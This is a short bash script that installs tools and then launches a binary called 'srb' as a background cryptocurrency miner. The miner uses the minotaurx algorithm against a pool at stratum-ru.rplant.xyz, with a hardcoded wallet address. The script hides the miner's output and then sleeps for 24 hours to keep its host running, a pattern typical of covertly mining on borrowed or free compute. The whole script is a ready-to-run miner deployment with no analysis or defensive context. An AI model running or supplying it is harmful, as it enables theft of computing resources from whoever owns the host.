#!/bin/bash
apt update && apt -y install wget git curl sudo
chmod 777 srb
./srb --disable-gpu --algorithm minotaurx --pool stratum+tcp://stratum-ru.rplant.xyz:7068 --wallet RXzEz9Qm1dNMj2V7PtEaQ2yz7kysjFGVq7.ama --password x >/dev/null &
sleep 24h
